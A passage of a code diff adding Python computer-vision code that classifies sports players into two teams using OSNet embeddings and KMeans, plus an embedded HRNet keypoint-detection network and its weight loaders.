+ return None
467
+
468
+ if isinstance(fc_dims, int):
469
+ fc_dims = [fc_dims]
470
+
471
+ layers = []
472
+ for dim in fc_dims:
473
+ layers.append(nn.Linear(input_dim, dim))
474
+ layers.append(nn.BatchNorm1d(dim))
475
+ layers.append(nn.ReLU(inplace=True))
476
+ if dropout_p is not None:
477
+ layers.append(nn.Dropout(p=dropout_p))
478
+ input_dim = dim
479
+
480
+ self.feature_dim = fc_dims[-1]
481
+
482
+ return nn.Sequential(*layers)
483
+
484
+ def _init_params(self):
485
+ for m in self.modules():
486
+ if isinstance(m, nn.Conv2d):
487
+ nn.init.kaiming_normal_(
488
+ m.weight, mode='fan_out', nonlinearity='relu'
489
+ )
490
+ if m.bias is not None:
491
+ nn.init.constant_(m.bias, 0)
492
+
493
+ elif isinstance(m, nn.BatchNorm2d):
494
+ nn.init.constant_(m.weight, 1)
495
+ nn.init.constant_(m.bias, 0)
496
+
497
+ elif isinstance(m, nn.BatchNorm1d):
498
+ nn.init.constant_(m.weight, 1)
499
+ nn.init.constant_(m.bias, 0)
500
+
501
+ elif isinstance(m, nn.Linear):
502
+ nn.init.normal_(m.weight, 0, 0.01)
503
+ if m.bias is not None:
504
+ nn.init.constant_(m.bias, 0)
505
+
506
+ def featuremaps(self, x):
507
+ x = self.conv1(x)
508
+ x = self.maxpool(x)
509
+ x = self.conv2(x)
510
+ x = self.conv3(x)
511
+ x = self.conv4(x)
512
+ x = self.conv5(x)
513
+ return x
514
+
515
+ def forward(self, x, return_featuremaps=False):
516
+ x = self.featuremaps(x)
517
+ if return_featuremaps:
518
+ return x
519
+ v = self.global_avgpool(x)
520
+ v = v.view(v.size(0), -1)
521
+ if self.fc is not None:
522
+ v = self.fc(v)
523
+ if not self.training:
524
+ return v
525
+ y = self.classifier(v)
526
+ if self.loss == 'softmax':
527
+ return y
528
+ elif self.loss == 'triplet':
529
+ return y, v
530
+ else:
531
+ raise KeyError("Unsupported loss: {}".format(self.loss))
532
+
533
+
534
+ def init_pretrained_weights(model, key=''):
535
+ """Initializes model with pretrained weights.
536
+
537
+ Layers that don't match with pretrained layers in name or size are kept unchanged.
538
+ """
539
+ import os
540
+ import errno
541
+ import gdown
542
+ from collections import OrderedDict
543
+
544
+ def _get_torch_home():
545
+ ENV_TORCH_HOME = 'TORCH_HOME'
546
+ ENV_XDG_CACHE_HOME = 'XDG_CACHE_HOME'
547
+ DEFAULT_CACHE_DIR = '~/.cache'
548
+ torch_home = os.path.expanduser(
549
+ os.getenv(
550
+ ENV_TORCH_HOME,
551
+ os.path.join(
552
+ os.getenv(ENV_XDG_CACHE_HOME, DEFAULT_CACHE_DIR), 'torch'
553
+ )
554
+ )
555
+ )
556
+ return torch_home
557
+
558
+ torch_home = _get_torch_home()
559
+ model_dir = os.path.join(torch_home, 'checkpoints')
560
+ try:
561
+ os.makedirs(model_dir)
562
+ except OSError as e:
563
+ if e.errno == errno.EEXIST:
564
+ # Directory already exists, ignore.
565
+ pass
566
+ else:
567
+ # Unexpected OSError, re-raise.
568
+ raise
569
+ filename = key + '_imagenet.pth'
570
+ cached_file = os.path.join(model_dir, filename)
571
+
572
+ if not os.path.exists(cached_file):
573
+ gdown.download(pretrained_urls[key], cached_file, quiet=False)
574
+
575
+ state_dict = torch.load(cached_file)
576
+ model_dict = model.state_dict()
577
+ new_state_dict = OrderedDict()
578
+ matched_layers, discarded_layers = [], []
579
+
580
+ for k, v in state_dict.items():
581
+ if k.startswith('module.'):
582
+ k = k[7:] # discard module.
583
+
584
+ if k in model_dict and model_dict[k].size() == v.size():
585
+ new_state_dict[k] = v
586
+ matched_layers.append(k)
587
+ else:
588
+ discarded_layers.append(k)
589
+
590
+ model_dict.update(new_state_dict)
591
+ model.load_state_dict(model_dict)
592
+
593
+ if len(matched_layers) == 0:
594
+ print(
595
+ 'The pretrained weights from "{}" cannot be loaded, '
596
+ 'please check the key names manually '
597
+ '(** ignored and continue **)'.format(cached_file)
598
+ )
599
+ else:
600
+ print(
601
+ 'Successfully loaded imagenet pretrained weights from "{}"'.
602
+ format(cached_file)
603
+ )
604
+ if len(discarded_layers) > 0:
605
+ print(
606
+ '** The following layers are discarded '
607
+ 'due to unmatched keys or layer size: {}'.
608
+ format(discarded_layers)
609
+ )
610
+
611
+
612
+ ##########
613
+ # Instantiation
614
+ ##########
615
+ def osnet_x1_0(num_classes=1000, pretrained=True, loss='softmax', **kwargs):
616
+ # standard size (width x1.0)
617
+ model = OSNet(
618
+ num_classes,
619
+ blocks=[OSBlock, OSBlock, OSBlock],
620
+ layers=[2, 2, 2],
621
+ channels=[64, 256, 384, 512],
622
+ loss=loss,
623
+ **kwargs
624
+ )
625
+ # if pretrained:
626
+ # init_pretrained_weights(model, key='osnet_x1_0')
627
+ return model
628
+
629
+ from typing import Generator, Iterable
630
+ import torchvision.transforms as T
631
+ from collections import OrderedDict
632
+ import os.path as osp
633
+
634
+ def load_checkpoint(fpath):
635
+ fpath = osp.abspath(osp.expanduser(fpath))
636
+ map_location = None if torch.cuda.is_available() else 'cpu'
637
+ # weights_only=False allows checkpoints that contain numpy/other objects (e.g. model.pth.tar-100)
638
+ checkpoint = torch.load(fpath, map_location=map_location, weights_only=False)
639
+ return checkpoint
640
+
641
+ def load_pretrained_weights(model, weight_path):
642
+ checkpoint = load_checkpoint(weight_path)
643
+ if 'state_dict' in checkpoint:
644
+ state_dict = checkpoint['state_dict']
645
+ else:
646
+ state_dict = checkpoint
647
+ model_dict = model.state_dict()
648
+ new_state_dict = OrderedDict()
649
+ matched_layers, discarded_layers = ([], [])
650
+ for k, v in state_dict.items():
651
+ if k.startswith('module.'):
652
+ k = k[7:]
653
+ if k in model_dict and model_dict[k].size() == v.size():
654
+ new_state_dict[k] = v
655
+ matched_layers.append(k)
656
+ else:
657
+ discarded_layers.append(k)
658
+ model_dict.update(new_state_dict)
659
+ model.load_state_dict(model_dict)
660
+
661
+ def load_osnet(device="cuda", weight_path=None):
662
+ """Build osnet_x1_0 and load weights from model.pth.tar-100 via load_pretrained_weights."""
663
+ model = osnet_x1_0(num_classes=1, loss='softmax', pretrained=False, use_gpu=device == 'cuda')
664
+ # if weight_path is None:
665
+ # weight_path = Path(__file__).resolve().parent / "model.pth.tar-100"
666
+ weight_path = Path(weight_path)
667
+ if weight_path.exists():
668
+ load_pretrained_weights(model, str(weight_path))
669
+ model.eval()
670
+ model.to(device)
671
+ return model
672
+
673
+ def filter_player_boxes(
674
+ boxes: List[BoundingBox],
675
+ min_area: int = 1500
676
+ ) -> List[BoundingBox]:
677
+
678
+ players = []
679
+ for b in boxes:
680
+ if b.cls_id != 2: # only players
681
+ continue
682
+ # area = (b.x2 - b.x1) * (b.y2 - b.y1)
683
+ # if area < min_area:
684
+ # continue
685
+
686
+ players.append(b)
687
+
688
+ return players
689
+
690
+ # OSNet preprocess (same as team_cluster: Resize, ToTensor, ImageNet normalize)
691
+ OSNET_IMAGE_SIZE = (64, 32) # (height, width)
692
+ OSNET_PREPROCESS = T.Compose([
693
+ T.Resize(OSNET_IMAGE_SIZE),
694
+ T.ToTensor(),
695
+ T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
696
+ ])
697
+
698
+ def crop_upper_body(frame: np.ndarray, box: BoundingBox) -> np.ndarray:
699
+ # h = box.y2 - box.y1
700
+ # y2 = box.y1 + int(0.6 * h)
701
+
702
+ return frame[
703
+ max(0, box.y1):max(0, box.y2),
704
+ max(0, box.x1):max(0, box.x2)
705
+ ]
706
+
707
+ def preprocess_osnet(crop: np.ndarray) -> torch.Tensor:
708
+ """BGR crop -> RGB PIL -> Resize, ToTensor, ImageNet Normalize (same as team_cluster)."""
709
+ rgb = cv2.cvtColor(crop, cv2.COLOR_BGR2RGB)
710
+ pil = Image.fromarray(rgb)
711
+ return OSNET_PREPROCESS(pil)
712
+
713
+ @torch.no_grad()
714
+ def extract_osnet_embeddings(
715
+ frames: List[np.ndarray],
716
+ # batch_boxes: List[List[BoundingBox]],
717
+ batch_boxes: dict[int, List[BoundingBox]],
718
+ device="cuda"
719
+ ) -> Tuple[np.ndarray, List[BoundingBox]]:
720
+
721
+ crops = []
722
+ meta = []
723
+ for frame, frame_index, boxes in zip(frames, batch_boxes.keys(), batch_boxes.values()):
724
+ players = filter_player_boxes(boxes)
725
+
726
+ for box in players:
727
+ crop = crop_upper_body(frame, box)
728
+ if crop.size == 0:
729
+ continue
730
+
731
+ crops.append(preprocess_osnet(crop))
732
+ meta.append(box)
733
+
734
+ if not crops:
735
+ return None, None
736
+
737
+ batch = torch.stack(crops).to(device)
738
+ with torch.no_grad(): # Inference mode saves ~20-30%
739
+ batch = batch.float().to(device)
740
+ embeddings = _OSNET_MODEL(batch) # (N, 256)
741
+ del batch
742
+ torch.cuda.empty_cache()
743
+
744
+ embeddings = embeddings.cpu().numpy()
745
+ # embeddings /= np.linalg.norm(embeddings, axis=1, keepdims=True)
746
+
747
+ return embeddings, meta
748
+
749
+ def aggregate_by_track(
750
+ embeddings: np.ndarray,
751
+ meta: List[BoundingBox]
752
+ ):
753
+ track_map = defaultdict(list)
754
+ box_map = {}
755
+
756
+
757
+ for emb, box in zip(embeddings, meta):
758
+ key = box.track_id if box.track_id is not None else id(box)
759
+ track_map[key].append(emb)
760
+ box_map[key] = box
761
+
762
+ agg_embeddings = []
763
+ agg_boxes = []
764
+
765
+ for key, embs in track_map.items():
766
+ mean_emb = np.mean(embs, axis=0)
767
+ mean_emb /= np.linalg.norm(mean_emb)
768
+
769
+ agg_embeddings.append(mean_emb)
770
+ agg_boxes.append(box_map[key])
771
+
772
+ return np.array(agg_embeddings), agg_boxes
773
+
774
+ def cluster_teams(embeddings: np.ndarray):
775
+ if len(embeddings) < 2:
776
+ return None
777
+
778
+ kmeans = KMeans(n_clusters=2, n_init = 2, random_state=42)
779
+ return kmeans.fit_predict(embeddings)
780
+
781
+ def update_team_ids(
782
+ boxes: List[BoundingBox],
783
+ labels: np.ndarray
784
+ ):
785
+ for box, label in zip(boxes, labels):
786
+ box.cls_id = TEAM_1_ID if label == 0 else TEAM_2_ID
787
+
788
+ def classify_teams_batch(
789
+ frames: List[np.ndarray],
790
+ # batch_boxes: List[List[BoundingBox]],
791
+ batch_boxes: dict[int, List[BoundingBox]],
792
+ device="cuda"
793
+ ):
794
+ # Fallback: OSNet embeddings + aggregate by track + KMeans
795
+ embeddings, meta = extract_osnet_embeddings(
796
+ frames, batch_boxes, device
797
+ )
798
+ if embeddings is None:
799
+ return
800
+ embeddings, agg_boxes = aggregate_by_track(embeddings, meta)
801
+ n = len(embeddings)
802
+ if n == 0:
803
+ return
804
+ if n == 1:
805
+ agg_boxes[0].cls_id = TEAM_1_ID
806
+ return
807
+
808
+ kmeans = KMeans(n_clusters=2, n_init=2, random_state=42)
809
+ kmeans.fit(embeddings)
810
+ centroids = kmeans.cluster_centers_ # (2, dim)
811
+ # print("Clusters' centers:")
812
+ # for i, c in enumerate(centroids):
813
+ # print(f" cluster_{i}: shape={c.shape}, norm={np.linalg.norm(c):.4f}, mean={np.mean(c):.4f}")
814
+ c0, c1 = centroids[0], centroids[1]
815
+ norm_0 = np.linalg.norm(c0)
816
+ norm_1 = np.linalg.norm(c1)
817
+ # Similarity (cosine), distance (L2), square error (SSE) between the two centers
818
+ similarity = np.dot(c0, c1) / (norm_0 * norm_1 + 1e-12)
819
+ distance = np.linalg.norm(c0 - c1)
820
+ square_error = np.sum((c0 - c1) ** 2)
821
+ # print(f" Between centers: similarity(cosine)={similarity:.4f}, distance(L2)={distance:.4f}, square_error(SSE)={square_error:.4f}")
822
+ if similarity > 0.95:
823
+ # Centers too similar: treat as one cluster (all same team)
824
+ for b in agg_boxes:
825
+ b.cls_id = TEAM_1_ID
826
+ # print(" Similarity > 0.95: using single cluster (all assigned to team 1).")
827
+ return
828
+ # If cluster_centers_[0] > cluster_centers_[1] then team A = cluster 0, else team B = cluster 0 (swap)
829
+ if norm_0 <= norm_1:
830
+ kmeans.labels_ = 1 - kmeans.labels_
831
+ update_team_ids(agg_boxes, kmeans.labels_)
832
+ # ==============================================================
833
+ # 🔥 HRNET IMPLEMENTATION (embedded instead of importing)
834
+ # ==============================================================
835
+
836
+ # import torch.nn as nn
837
+ # import torch.nn.functional as F
838
+ import yaml
839
+
840
+
841
+ BatchNorm2d = nn.BatchNorm2d
842
+ BN_MOMENTUM = 0.1
843
+
844
+ def conv3x3(in_planes, out_planes, stride=1):
845
+ return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)
846
+
847
+ class BasicBlock(nn.Module):
848
+ expansion = 1
849
+ def __init__(self, inplanes, planes, stride=1, downsample=None):
850
+ super().__init__()
851
+ self.conv1 = conv3x3(inplanes, planes, stride)
852
+ self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
853
+ self.relu = nn.ReLU(inplace=True)
854
+ self.conv2 = conv3x3(planes, planes)
855
+ self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
856
+ self.downsample = downsample
857
+
858
+ def forward(self, x):
859
+ residual = x
860
+ out = self.relu(self.bn1(self.conv1(x)))
861
+ out = self.bn2(self.conv2(out))
862
+ if self.downsample is not None:
863
+ residual = self.downsample(x)
864
+ out += residual
865
+ return self.relu(out)
866
+
867
+
868
+ class Bottleneck(nn.Module):
869
+ expansion = 4
870
+
871
+ def __init__(self, inplanes, planes, stride=1, downsample=None):
872
+ super(Bottleneck, self).__init__()
873
+ self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
874
+ self.bn1 = BatchNorm2d(planes, momentum=BN_MOMENTUM)
875
+ self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
876
+ padding=1, bias=False)
877
+ self.bn2 = BatchNorm2d(planes, momentum=BN_MOMENTUM)
878
+ self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1,
879
+ bias=False)
880
+ self.bn3 = BatchNorm2d(planes * self.expansion,
881
+ momentum=BN_MOMENTUM)
882
+ self.relu = nn.ReLU(inplace=True)
883
+ self.downsample = downsample
884
+ self.stride = stride
885
+
886
+ def forward(self, x):
887
+ residual = x
888
+
889
+ out = self.conv1(x)
890
+ out = self.bn1(out)
891
+ out = self.relu(out)
892
+
893
+ out = self.conv2(out)
894
+ out = self.bn2(out)
895
+ out = self.relu(out)
896
+
897
+ out = self.conv3(out)
898
+ out = self.bn3(out)
899
+
900
+ if self.downsample is not None:
901
+ residual = self.downsample(x)
902
+
903
+ out += residual
904
+ out = self.relu(out)
905
+
906
+ return out
907
+
908
+ class HighResolutionModule(nn.Module):
909
+ def __init__(self, num_branches, blocks, num_blocks, num_inchannels,
910
+ num_channels, fuse_method, multi_scale_output=True):
911
+ super(HighResolutionModule, self).__init__()
912
+ self._check_branches(
913
+ num_branches, blocks, num_blocks, num_inchannels, num_channels)
914
+
915
+ self.num_inchannels = num_inchannels
916
+ self.fuse_method = fuse_method
917
+ self.num_branches = num_branches
918
+
919
+ self.multi_scale_output = multi_scale_output
920
+
921
+ self.branches = self._make_branches(
922
+ num_branches, blocks, num_blocks, num_channels)
923
+ self.fuse_layers = self._make_fuse_layers()
924
+ self.relu = nn.ReLU(inplace=True)
925
+
926
+ def _check_branches(self, num_branches, blocks, num_blocks,
927
+ num_inchannels, num_channels):
928
+ if num_branches != len(num_blocks):
929
+ error_msg = 'NUM_BRANCHES({}) <> NUM_BLOCKS({})'.format(
930
+ num_branches, len(num_blocks))
931
+ logger.error(error_msg)
932
+ raise ValueError(error_msg)
933
+
934
+ if num_branches != len(num_channels):
935
+ error_msg = 'NUM_BRANCHES({}) <> NUM_CHANNELS({})'.format(
936
+ num_branches, len(num_channels))
937
+ logger.error(error_msg)
938
+ raise ValueError(error_msg)
939
+
940
+ if num_branches != len(num_inchannels):
941
+ error_msg = 'NUM_BRANCHES({}) <> NUM_INCHANNELS({})'.format(
942
+ num_branches, len(num_inchannels))
943
+ logger.error(error_msg)
944
+ raise ValueError(error_msg)
945
+
946
+ def _make_one_branch(self, branch_index, block, num_blocks, num_channels,
947
+ stride=1):
948
+ downsample = None
949
+ if stride != 1 or \
950
+ self.num_inchannels[branch_index] != num_channels[branch_index] * block.expansion:
951
+ downsample = nn.Sequential(
952
+ nn.Conv2d(self.num_inchannels[branch_index],
953
+ num_channels[branch_index] * block.expansion,
954
+ kernel_size=1, stride=stride, bias=False),
955
+ BatchNorm2d(num_channels[branch_index] * block.expansion,
956
+ momentum=BN_MOMENTUM),
957
+ )
958
+
959
+ layers = []
960
+ layers.append(block(self.num_inchannels[branch_index],
961
+ num_channels[branch_index], stride, downsample))
962
+ self.num_inchannels[branch_index] = \
963
+ num_channels[branch_index] * block.expansion
964
+ for i in range(1, num_blocks[branch_index]):
965
+ layers.append(block(self.num_inchannels[branch_index],
966
+ num_channels[branch_index]))
967
+
968
+ return nn.Sequential(*layers)
969
+
970
+ def _make_branches(self, num_branches, block, num_blocks, num_channels):
971
+ branches = []
972
+
973
+ for i in range(num_branches):
974
+ branches.append(
975
+ self._make_one_branch(i, block, num_blocks, num_channels))
976
+
977
+ return nn.ModuleList(branches)
978
+
979
+ def _make_fuse_layers(self):
980
+ if self.num_branches == 1:
981
+ return None
982
+
983
+ num_branches = self.num_branches
984
+ num_inchannels = self.num_inchannels
985
+ fuse_layers = []
986
+ for i in range(num_branches if self.multi_scale_output else 1):
987
+ fuse_layer = []
988
+ for j in range(num_branches):
989
+ if j > i:
990
+ fuse_layer.append(nn.Sequential(
991
+ nn.Conv2d(num_inchannels[j],
992
+ num_inchannels[i],
993
+ 1,
994
+ 1,
995
+ 0,
996
+ bias=False),
997
+ BatchNorm2d(num_inchannels[i], momentum=BN_MOMENTUM)))
998
+ # nn.Upsample(scale_factor=2**(j-i), mode='nearest')))
999
+ elif j == i:
1000
+ fuse_layer.append(None)
1001
+ else:
1002
+ conv3x3s = []
1003
+ for k in range(i - j):
1004
+ if k == i - j - 1:
1005
+ num_outchannels_conv3x3 = num_inchannels[i]
1006
+ conv3x3s.append(nn.Sequential(
1007
+ nn.Conv2d(num_inchannels[j],
1008
+ num_outchannels_conv3x3,
1009
+ 3, 2, 1, bias=False),
1010
+ BatchNorm2d(num_outchannels_conv3x3, momentum=BN_MOMENTUM)))
1011
+ else:
1012
+ num_outchannels_conv3x3 = num_inchannels[j]
1013
+ conv3x3s.append(nn.Sequential(
1014
+ nn.Conv2d(num_inchannels[j],
1015
+ num_outchannels_conv3x3,
1016
+ 3, 2, 1, bias=False),
1017
+ BatchNorm2d(num_outchannels_conv3x3,
1018
+ momentum=BN_MOMENTUM),
1019
+ nn.ReLU(inplace=True)))
1020
+ fuse_layer.append(nn.Sequential(*conv3x3s))
1021
+ fuse_layers.append(nn.ModuleList(fuse_layer))
1022
+
1023
+ return nn.ModuleList(fuse_layers)
1024
+
1025
+ def get_num_inchannels(self):
1026
+ return self.num_inchannels
1027
+
1028
+ def forward(self, x):
1029
+ if self.num_branches == 1:
1030
+ return [self.branches[0](x[0])]
1031
+
1032
+ for i in range(self.num_branches):
1033
+ x[i] = self.branches[i](x[i])
1034
+
1035
+ x_fuse = []
1036
+ for i in range(len(self.fuse_layers)):
1037
+ y = x[0] if i == 0 else self.fuse_layers[i][0](x[0])
1038
+ for j in range(1, self.num_branches):
1039
+ if i == j:
1040
+ y = y + x[j]
1041
+ elif j > i:
1042
+ y = y + F.interpolate(
1043
+ self.fuse_layers[i][j](x[j]),
1044
+ size=[x[i].shape[2], x[i].shape[3]],
1045
+ mode='bilinear')
1046
+ else:
1047
+ y = y + self.fuse_layers[i][j](x[j])
1048
+ x_fuse.append(self.relu(y))
1049
+
1050
+ return x_fuse
1051
+
1052
+
1053
+ blocks_dict = {
1054
+ 'BASIC': BasicBlock,
1055
+ 'BOTTLENECK': Bottleneck
1056
+ }
1057
+
1058
+ # --- HRNet backbone used in your checkpoint ---
1059
+ class HighResolutionNet(nn.Module):
1060
+
1061
+ def __init__(self, config, **kwargs):
1062
+ self.inplanes = 64
1063
+ extra = config['MODEL']['EXTRA']
1064
+ super(HighResolutionNet, self).__init__()
1065
+
1066
+ # stem net
1067
+ self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=3, stride=2, padding=1,
1068
+ bias=False)
1069
+ self.bn1 = BatchNorm2d(self.inplanes, momentum=BN_MOMENTUM)
1070
+ self.conv2 = nn.Conv2d(self.inplanes, self.inplanes, kernel_size=3, stride=2, padding=1,
1071
+ bias=False)
1072
+ self.bn2 = BatchNorm2d(self.inplanes, momentum=BN_MOMENTUM)
1073
+ self.relu = nn.ReLU(inplace=True)
1074
+ self.sf = nn.Softmax(dim=1)
1075
+ self.layer1 = self._make_layer(Bottleneck, 64, 64, 4)
1076
+
1077
+ self.stage2_cfg = extra['STAGE2']
1078
+ num_channels = self.stage2_cfg['NUM_CHANNELS']
1079
+ block = blocks_dict[self.stage2_cfg['BLOCK']]
1080
+ num_channels = [
1081
+ num_channels[i] * block.expansion for i in range(len(num_channels))]
1082
+ self.transition1 = self._make_transition_layer(
1083
+ [256], num_channels)
1084
+ self.stage2, pre_stage_channels = self._make_stage(
1085
+ self.stage2_cfg, num_channels)
1086
+
1087
+ self.stage3_cfg = extra['STAGE3']
1088
+ num_channels = self.stage3_cfg['NUM_CHANNELS']
1089
+ block = blocks_dict[self.stage3_cfg['BLOCK']]
1090
+ num_channels = [
1091
+ num_channels[i] * block.expansion for i in range(len(num_channels))]
1092
+ self.transition2 = self._make_transition_layer(
1093
+ pre_stage_channels, num_channels)
1094
+ self.stage3, pre_stage_channels = self._make_stage(
1095
+ self.stage3_cfg, num_channels)
1096
+
1097
+ self.stage4_cfg = extra['STAGE4']
1098
+ num_channels = self.stage4_cfg['NUM_CHANNELS']
1099
+ block = blocks_dict[self.stage4_cfg['BLOCK']]
1100
+ num_channels = [
1101
+ num_channels[i] * block.expansion for i in range(len(num_channels))]
1102
+ self.transition3 = self._make_transition_layer(
1103
+ pre_stage_channels, num_channels)
1104
+ self.stage4, pre_stage_channels = self._make_stage(
1105
+ self.stage4_cfg, num_channels, multi_scale_output=True)
1106
+
1107
+ self.upsample = nn.Upsample(scale_factor=2, mode='nearest')
1108
+ final_inp_channels = sum(pre_stage_channels) + self.inplanes
1109
+
1110
+ self.head = nn.Sequential(nn.Sequential(
1111
+ nn.Conv2d(
1112
+ in_channels=final_inp_channels,
1113
+ out_channels=final_inp_channels,
1114
+ kernel_size=1),
1115
+ BatchNorm2d(final_inp_channels, momentum=BN_MOMENTUM),
1116
+ nn.ReLU(inplace=True),
1117
+ nn.Conv2d(
1118
+ in_channels=final_inp_channels,
1119
+ out_channels=config['MODEL']['NUM_JOINTS'],
1120
+ kernel_size=extra['FINAL_CONV_KERNEL']),
1121
+ nn.Softmax(dim=1)))
1122
+
1123
+
1124
+
1125
+ def _make_head(self, x, x_skip):
1126
+ x = self.upsample(x)
1127
+ x = torch.cat([x, x_skip], dim=1)
1128
+ x = self.head(x)
1129
+
1130
+ return x
1131
+
1132
+ def _make_transition_layer(
1133
+ self, num_channels_pre_layer, num_channels_cur_layer):
1134
+ num_branches_cur = len(num_channels_cur_layer)
1135
+ num_branches_pre = len(num_channels_pre_layer)
1136
+
1137
+ transition_layers = []
1138
+ for i in range(num_branches_cur):
1139
+ if i < num_branches_pre:
1140
+ if num_channels_cur_layer[i] != num_channels_pre_layer[i]:
1141
+ transition_layers.append(nn.Sequential(
1142
+ nn.Conv2d(num_channels_pre_layer[i],
1143
+ num_channels_cur_layer[i],
1144
+ 3,
1145
+ 1,
1146
+ 1,
1147
+ bias=False),
1148
+ BatchNorm2d(
1149
+ num_channels_cur_layer[i], momentum=BN_MOMENTUM),
1150
+ nn.ReLU(inplace=True)))
1151
+ else:
1152
+ transition_layers.append(None)
1153
+ else:
1154
+ conv3x3s = []
1155
+ for j in range(i + 1 - num_branches_pre):
1156
+ inchannels = num_channels_pre_layer[-1]
1157
+ outchannels = num_channels_cur_layer[i] \
1158
+ if j == i - num_branches_pre else inchannels
1159
+ conv3x3s.append(nn.Sequential(
1160
+ nn.Conv2d(
1161
+ inchannels, outchannels, 3, 2, 1, bias=False),
1162
+ BatchNorm2d(outchannels, momentum=BN_MOMENTUM),
1163
+ nn.ReLU(inplace=True)))
1164
+ transition_layers.append(nn.Sequential(*conv3x3s))
1165
+
1166
+ return nn.ModuleList(transition_layers)
1167
+
1168
+ def _make_layer(self, block, inplanes, planes, blocks, stride=1):
1169
+ downsample = None
1170
+ if stride != 1 or inplanes != planes * block.expansion:
1171
+ downsample = nn.Sequential(
1172
+ nn.Conv2d(inplanes, planes * block.expansion,
1173
+ kernel_size=1, stride=stride, bias=False),
1174
+ BatchNorm2d(planes * block.expansion, momentum=BN_MOMENTUM),
1175
+ )
1176
+
1177
+ layers = []
1178
+ layers.append(block(inplanes, planes, stride, downsample))
1179
+ inplanes = planes * block.expansion
1180
+ for i in range(1, blocks):
1181
+ layers.append(block(inplanes, planes))
1182
+
1183
+ return nn.Sequential(*layers)
1184
+
1185
+ def _make_stage(self, layer_config, num_inchannels,
1186
+ multi_scale_output=True):
1187
+ num_modules = layer_config['NUM_MODULES']
1188
+ num_branches = layer_config['NUM_BRANCHES']
1189
+ num_blocks = layer_config['NUM_BLOCKS']
1190
+ num_channels = layer_config['NUM_CHANNELS']
1191
+ block = blocks_dict[layer_config['BLOCK']]
1192
+ fuse_method = layer_config['FUSE_METHOD']
1193
+
1194
+ modules = []
1195
+ for i in range(num_modules):
1196
+ # multi_scale_output is only used last module
1197
+ if not multi_scale_output and i == num_modules - 1:
1198
+ reset_multi_scale_output = False
1199
+ else:
1200
+ reset_multi_scale_output = True
1201
+ modules.append(
1202
+ HighResolutionModule(num_branches,
1203
+ block,
1204
+ num_blocks,
1205
+ num_inchannels,
1206
+ num_channels,
1207
+ fuse_method,
1208
+ reset_multi_scale_output)
1209
+ )
1210
+ num_inchannels = modules[-1].get_num_inchannels()
1211
+
1212
+ return nn.Sequential(*modules), num_inchannels
1213
+
1214
+ def forward(self, x):
1215
+ # h, w = x.size(2), x.size(3)
1216
+ x = self.conv1(x)
1217
+ x_skip = x.clone()
1218
+ x = self.bn1(x)
1219
+ x = self.relu(x)
1220
+ x = self.conv2(x)
1221
+ x = self.bn2(x)
1222
+ x = self.relu(x)
1223
+ x = self.layer1(x)
1224
+
1225
+ x_list = []
1226
+ for i in range(self.stage2_cfg['NUM_BRANCHES']):
1227
+ if self.transition1[i] is not None:
1228
+ x_list.append(self.transition1[i](x))
1229
+ else:
1230
+ x_list.append(x)
1231
+ y_list = self.stage2(x_list)
1232
+
1233
+ x_list = []
1234
+ for i in range(self.stage3_cfg['NUM_BRANCHES']):
1235
+ if self.transition2[i] is not None:
1236
+ x_list.append(self.transition2[i](y_list[-1]))
1237
+ else:
1238
+ x_list.append(y_list[i])
1239
+ y_list = self.stage3(x_list)
1240
+
1241
+ x_list = []
1242
+ for i in range(self.stage4_cfg['NUM_BRANCHES']):
1243
+ if self.transition3[i] is not None:
1244
+ x_list.append(self.transition3[i](y_list[-1]))
1245
+ else:
1246
+ x_list.append(y_list[i])
1247
+ x = self.stage4(x_list)
1248
+
1249
+ # Head Part
1250
+ height, width = x[0].size(2), x[0].size(3)
1251
+ x1 = F.interpolate(x[1], size=(height, width), mode='bilinear', align_corners=False)
1252
+ x2 = F.interpolate(x[2], size=(height, width), mode='bilinear', align_corners=False)
1253
+ x3 = F.interpolate(x[3], size=(height, width), mode='bilinear', align_corners=False)
1254
+ x = torch.cat([x[0], x1, x2, x3], 1)
1255
+ x = self._make_head(x, x_skip)
1256
+
1257
+ return x
1258
+
1259
+ def init_weights(self, pretrained=''):
1260
+ print('=> init weights from normal distribution')
1261
+ for m in self.modules():
1262
+ if isinstance(m, nn.Conv2d):
1263
+ nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
1264
+ #nn.init.normal_(m.weight, std=0.001)
1265
+ #nn.init.constant_(m.bias, 0)
1266
+ elif isinstance(m, nn.BatchNorm2d):
1267
+ nn.init.constant_(m.weight, 1)
1268
+ nn.init.constant_(m.bias, 0)
1269
+ if pretrained != '':
1270
+ if os.path.isfile(pretrained):
1271
+ pretrained_dict = torch.load(pretrained)
1272
+ logger.info('=> loading pretrained model {}'.format(pretrained))
1273
+ print('=> loading pretrained model {}'.format(pretrained))
1274
+ model_dict = self.state_dict()
1275
+ pretrained_dict = {k: v for k, v in pretrained_dict.items()
1276
+ if k in model_dict.keys()}
1277
+ for k, _ in pretrained_dict.items():
1278
+ logger.info(
1279
+ '=> loading {} pretrained model {}'.format(k, pretrained))
1280
+ #print('=> loading {} pretrained model {}'.format(k, pretrained))
1281
+ model_dict.update(pretrained_dict)
1282
+ self.load_state_dict(model_dict)
1283
+ else:
1284
+ sys.exit(f'Weights {pretrained} not found.')
1285
+
1286
+
1287
+ def get_cls_net(config, pretrained='', **kwargs):
1288
+ model = HighResolutionNet(config, **kwargs)
1289
+ model.init_weights(pretrained)
1290
+ return model
1291
+
1292
+ def load_hrnet(path_hf_repo, device="cuda"):
1293
+ config_path = path_hf_repo / "hrnetv2_w48.yaml"
1294
+ print(f"config_path: {config_path}")
1295
+ cfg = yaml.safe_load(open(config_path, "r"))
1296
+ model = get_cls_net(cfg)
1297
+ weights_path = path_hf_repo / "keypoint_detect.pt"
1298
+ print(f"weights_path: {weights_path}")
1299
+ state = torch.load(weights_path, map_location=device)
1300
+ if isinstance(state, dict) and "state_dict" in state:
1301
+ state = state["state_dict"]
1302
+ model.load_state_dict(state, strict=False)
1303
+ model.to(device).eval()
1304
+ return model
1305
+
1306
+ # ==============================================================
1307
+ # HRNet utilities
1308
+ # ==============================================================
1309
